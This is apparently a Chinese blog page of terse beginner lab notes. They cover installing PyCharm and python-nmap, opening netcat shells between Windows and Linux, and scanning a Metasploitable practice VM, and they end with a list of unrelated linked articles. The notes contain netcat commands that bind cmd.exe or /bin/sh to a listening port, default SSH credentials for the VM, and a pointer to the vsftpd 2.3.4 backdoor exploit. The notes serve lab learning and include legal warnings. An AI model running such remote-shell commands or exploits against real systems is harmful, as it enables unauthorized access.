安装pycharm

www.jetbrains.com/pycharm/

tar -zxvf p补全

ls

cd p补全

ls

cd bin

ls

./pycharm.sh

新建项目 pythonRocks.py

print "python Rocks"

cd Desktop

ls

chmod +x pythonRocks.py

ls

python pythonRocks.py

导入Nmap模块

cd Desktop

pip install python-nmap
  • 从网站的方式下载模块
pypi.python.org/pypi

索引 nmap

解压   打开终端

cd python-nmap-0.6.1/

ls

cd python-nmap-0.6.1/

ls

python setup.py install

打开pycharm 新建项目 nmap_Test

improt nmap

nmap1 =nmap.PortScanner()

a = nmap1.nmap_version()

print(a)


ls

python nmap_Test.py

nmap -v

netcat反向shell

ncat

nc --help

nc -help

windows:cd Desktop

nc -vlp 1200

linux:nc - vv windowsIP地址 1200

hello,this it a test message.

windows:hello,it is me.

linux:退出nc

windows:nc -help

nc -vlp 1200 -e cmd.exe

linux:nc - vv windowsIP地址 1200


nc -vlp 1200 -e /bin/sh

ncat -e /bin/sh 1200

sudo bash

apt-get install nmap

ncat -e /bin/sh -vlp 1200

windows:nc -vv linuxIP地址 1200

metasploitable

服务器端攻击,这些IP一般不会变,域名如facebook.com

ping www.facebook.com

下载靶机metasploitable到虚拟机

  • 在靶机中的所有实验和现实情况是一模一样的,请大家一定要遵守法律。

  • 不得打着没有实战的口号,进行正式站点的实战尝试。

    ** 你会发现带有网络web功能的靶机在浏览器里显示内容。

    ** 它是没有安全性功能的靶机,更方便用于原理学习,帮助你更好的验证红队技术。

    ** 正相反,实际站点的安全性非常丰富,防御组件繁多,更不利于学习和掌握核心技术。

    ** 因此,综合所有原因。靶机才是最实际的实战方式,可以测试你所有技术。

  • 例子为parrot发行版

确保靶机网络设置为NAT

不管是服务器渗透还是客户端渗透,先拿到目标IP地址

靶机:ifconfig

parrot:浏览器     输入靶机IP

我们的目标是收集信息,收集靶机中的关于服务器的信息

你可以使用zenmap和nmap在图形化工具与命令行工具中灵活切换

打开zenmap 输入靶机IP地址  选择强烈扫描    下面就会显示生成命令行

会看见打开了很多服务与端口

ssh msfadmin@靶机IP

是否使用RSA密钥选择yes

默认密码 msfadmin

clear    ls    ifconfig    whoami    uname -r    logout

查看zenmap扫描结果信息

谷歌 vsftpd 2.3.4 exploits    得到这个模块是一个获取后门的模块

parrot:msfconsole



再次声明:过分的体现红队信息,真正受益者是用户和蓝队。

如果您不看见,就不会注意版本信息,也就不会重视升级与更新。

随着时间的推移,攻击您的不是初学者,而是更高级别的国际犯罪者。

7.安装pycharm----导入Nmap模块----netcat反向shell----metasploitable靶机环境的更多相关文章

  1. 5.pycharm中导入第三方模块的方法

    最近刚入门学习python,网上查找了一些资料,发现python编程用的软件pycharm还是比较多的,于是就跟随大众,学习使用pycharm,在学习的过程中,想要导入第三方模块pyperclip,但 ...

  2. Python:Pycharm下无法导入安装好的第三方模块?

    Pycharm下无法导入安装好的第三方模块requests? 在cmd下使用pip安装好requests模块后,可以使用import requests,但在Pycharm IDE下无法导入,出现如下错 ...

  3. win10 +python3.6环境下安装opencv以及pycharm导入cv2有问题的解决办法

    一.安装opencv 借鉴的这篇博客已经写得很清楚了--------https://blog.csdn.net/u011321546/article/details/79499598       ,这 ...

  4. PyCharm中导入MySQLDB模块小结

    安装完MySQL-python驱动,在PyCharm中导入MySQLDB模块一直不成功 Settings里面也没有MySQLdb 百般尝试找解决办法,一直搞不定,最后抱着试一试的心态尝试了一个办法: ...

  5. pycharm导入自己写的包的时候,不能识别模块的解决办法

    今天用写selenium脚本的时候导入自己统计目录下的模块时,出错,明明存在但是报错说模块不存在,找了半天终于找到解决方案,顺便记录一下吧 pycharm不会将当前文件目录自动加入自己的sourse_ ...

  6. 解决pycharm不能导入bs4模块问题

    问题描述: 在导入bs4模块时有报错提示 “ Traceback (most recent call last): File "E:/project/code/py-pengfu/py-pf ...

  7. PyCharm导入模块报No model named

    PyCharm导入模块报No model named 引言 在PyCharm中同目录下import其他模块,出现No model named ...的报错,但实际可以运行的情况. 这很可能是因为PyC ...

  8. 在Pycharm中导入第三方模块库(诸如:matplotlib、numpy等)

    在Pycharm中导入第三方模块库 一.打开pycharm: 二.点击菜单上的“file” -> “setting”: 三.步骤二完成后出现界面如下所示.选中你的项目(比如thisyan Pro ...

  9. pycharm IDE在导入自定义模块时提示有错,但实际没错

    在建立python项目时,有时为了区分资源和代码,如在项目文件夹下新建img和src两个文件夹,这时导入自定义模块会提示错误,结果没错但感觉别扭.如: 这是因为pycharm提示功能是从根目录上去寻找 ...

随机推荐

  1. u-boot中bss段的使用

    近日在调试uboot时,发现了一个现象,即在relocate_code前如果给未初始化或者初始化值为0的变量赋值的话,则在relocate_code后程序无法正常执行.经过学习,恶补如下知识 BSS段 ...

  2. 在win32中使用SetWindowSubclass阻止Enter键

    使用阻止Enter键的编辑控件的简单子类来完成此操作: LRESULT CALLBACK EditSubclassProc(HWND hWnd, UINT uMsg, WPARAM wParam, L ...

  3. MyEclipse使用教程:使用主题自定义工作台外观

    [MyEclipse CI 2019.4.0安装包下载] 您可以通过选择Window>Preferences>General>Appearance来使用主题自定义的工作台外观,可以从 ...

  4. Python之网路编程之进程池及回调函数

    一.数据共享 1.进程间的通信应该尽量避免共享数据的方式 2.进程间的数据是独立的,可以借助队列或管道实现通信,二者都是基于消息传递的. 虽然进程间数据独立,但可以用过Manager实现数据共享,事实 ...

  5. hbase字典顺序表(即ASCII码表顺序)

  6. 两个惊艳的python库:tqdm和retry

    转载到请包括本文地址:http://spaces.ac.cn/archives/3902/ Python基本是我目前工作.计算.数据挖掘的唯一编程语言(除了符号计算用Mathematica外).当然, ...

  7. jquery扩展方法(表单数据格式化为json对象)

    1.jquery扩展方法(表单数据格式化为json对象) <script type="text/javascript"> // 将表单数据序列化为一个json对象,例如 ...

  8. CF718C Sasha and Array 线段树 + 矩阵乘法

    有两个操作: 将 $[l,r]$所有数 + $x$ 求 $\sum_{i=l}^{r}fib(i)$ $n=m=10^5$   直接求不好求,改成矩阵乘法的形式:  $a_{i}=M^x\times ...

  9. BZOJ3438 小M的作物(和拓展)

    题目链接:戳我 我们如果要选择一种种植情况的话,一定是其他的选择都不可行了.这种决策问题用最小割来处理最好不过. 建图方式--A为源点,B为汇点.然后将每个点分别向A,B连边,边权为种植它的价值.组合 ...

  10. YOLO_v1

    目标检测算法可以分为两类: 一类是基于region proposal的R-CNN系列算法(R-CNN,Fast R-CNN, Faster R-CNN),它们是two-stage的.要先使用启发式方法 ...